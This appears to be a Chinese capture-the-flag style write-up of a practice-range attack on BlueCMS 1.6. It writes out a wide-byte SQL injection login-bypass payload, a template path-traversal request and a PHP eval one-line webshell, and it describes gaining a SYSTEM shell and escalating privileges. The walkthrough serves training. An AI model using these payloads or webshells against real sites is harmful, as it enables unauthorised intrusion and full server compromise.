封神台之萌新也能找CMS漏洞整理记录

工具

御剑后台扫描工具 ，BurpSuite， 菜刀、蚁剑

信息收集

靶场地址
后台地址
先扫下敏感目录，这是后面才找来的工具，不然时间省下不少，后台是自己猜的，在模版文件路径那里白搞了半天（菜~）：

很明显，本站用的是CMS模版，版本：BlueCMS 1.6 ，页脚有显示：

然后网上查相关漏洞，存在SQL注入，这里就不说了，很多。查找过程中发现一个有意思的东西，后台登陆存在宽字节注入，无需账号密码即可登陆后台？？？
参考下：BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析

进入后台登陆页面

使用任意账号密码登陆抓包，因为不填的话会报错：

• 抓包修改 admin_name=%df%27+or+1%3D1%23
• 明文就是 %df' or 1=1#
• 单引号被转义后变成%df\' or 1=1#
• 宽字节注入是利用mysql的一个特性,因为gbk是多字节编码，他认为两个字节代表一个汉字，所以%df 和后面的\也就是%5c变成了一个汉字“運”，而单引号逃逸了出来，就可以成功闭合sql语句了
• 再加上后面的or 1=1 #就构造成了永真语句，可以成功免密登录管理员后台了。

关掉BURP代理，重新刷新后台页面即可成功登陆：

通过后台直接获取SHELL

模版修改处存在越级访问漏洞！当然查到的（万能的网友~）

随意选一个点编辑，打开开发者工具F12，找到内嵌表单地址在新窗口打开

打开后再选一个编辑

然后修改地址

跳到上层目录tpl_name=../../ann.php 并修改模版文件写入PHP一句话木马 <?php @eval($_POST["cmd"]);echo "写入一句话成功！"?> echo部分只是用来验证是否写入成功，因为是测试，正常渗透应该删除，点击下方提交

回到首页更新缓存！

打开木马文件看一下，写入成功

接下来上菜刀或者蚁剑

连接成功！

使用终端shell

使用whoami看了一下，权限是system,这是因为上一章靶场获取的权限，正常来说，这里应该是普通用户权限，连使用whoami的权限都没有，这里需要提权，至于工具，已经有人上传到服务器了，就在D盘的RECYCLER文件夹下，具体的就不多说了，使用第五章的提权可以创建一个管理员账号远程登陆服务器，再然后呢，可以通过第六章使用一个工具来获取管理员的明文密码，只是到目前为止，我都不知道有没有flag，但是靶场上有且仅有一个人提交了flag,这就很难受了，服务器都拿下了，也没办法。

如果谁有flag麻烦告知一声~谢谢！